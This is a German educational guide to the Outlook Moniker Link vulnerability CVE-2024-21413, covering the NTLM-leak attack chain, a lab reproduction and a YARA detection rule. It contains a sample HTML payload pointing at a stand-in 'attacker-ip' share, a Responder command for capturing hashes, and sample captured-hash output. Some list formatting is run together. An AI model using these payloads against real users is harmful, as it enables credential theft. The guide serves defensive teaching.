
Bildungsleitfaden zu CVE-2024-21413, einer Zero-Click-Outlook-Sicherheitslücke, die NTLM-Credential-Diebstahl über Moniker-Links ermöglicht. Behandelt Ausnutzung, Erkennung mit YARA und Abwehrstrategien.
CVE-2024-21413, allgemein als Moniker-Link-Schwachstelle bezeichnet, ist ein kritischer Sicherheitsfehler in Microsoft Outlook, der es Angreifern ermöglicht, Benutzeranmeldeinformationen ohne jegliche Interaktion preiszugeben.
Im Gegensatz zu herkömmlichen Phishing-Angriffen kann diese Schwachstelle bereits durch Vorschau einer E-Mail ausgelöst werden, was sie in Unternehmensumgebungen besonders gefährlich macht.
Das Problem resultiert aus der Art und Weise, wie Outlook Moniker-Links verarbeitet, was zu unbeabsichtigten Authentifizierungsversuchen gegenüber angreifergesteuerten Systemen führt.
Das Verständnis der folgenden Konzepte ist wichtig:
Ein Windows-spezifischer Mechanismus, der es Anwendungen ermöglicht, auf externe Ressourcen über Protokolle wie zu verweisen:
file://unc://\\attacker-server\share
Wird verwendet, um auf gemeinsam genutzte Ressourcen über ein Netzwerk zuzugreifen. Bei dieser Schwachstelle wird es missbraucht, um Authentifizierungsanfragen zu erzwingen.
Die Geschützte Ansicht von Outlook soll potenziell unsichere Inhalte isolieren. Diese Schwachstelle umgeht diesen Schutz und ermöglicht den Zugriff auf externe Ressourcen.
Erstellen der Nutzlast
file://attacker-server/share) in eine E-Mail ein.Zustellung
Auslösung
Automatische Verarbeitung
Authentifizierungsanfrage
Offenlegung der Anmeldeinformationen
[Angreifer]
|
| 1. Sende präparierte E-Mail
v
[Opfer Outlook]
|
| 2. Automatische Verarbeitung des Moniker-Links
v
[Windows-System]
|
| 3. NTLM-Authentifizierungsversuch
v
[Angreifer-Server]
|
| 4. Erfasse NTLM-Hash
v
[Missbrauch von Anmeldeinformationen / Laterale Bewegung]
⚠️ Nur in kontrollierten Laborumgebungen durchführen
sudo responder -I eth0
<a href="file://attacker-ip/share">Open Document</a>
[SMB] NTLMv2 Hash captured
User: victim
Eine Erkennungsregel wurde von Florian Roth entwickelt, um Ausnutzungsversuche mit Moniker-Links zu identifizieren.
rule Outlook_MonikerLink_CVE_2024_21413
{
meta:
description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
author = "Florian Roth"
reference = "CVE-2024-21413"
strings:
$a = "file://"
$b = "\\\\"
condition:
any of them
}
file://- und UNC-basierte Links filtern oder bereinigenCVE-2024-21413 zeigt, wie tief integrierte Systemverhaltensweisen (wie automatische Authentifizierung) durch scheinbar harmlose Eingaben wie E-Mail-Links ausgenutzt werden können.
💡 Empfehlung: Reproduzieren Sie diese Schwachstelle in einer virtuellen Laborumgebung (z. B. Windows-VM + Angreifer-VM), um die Angriffskette und Verteidigungsstrategien vollständig zu verstehen.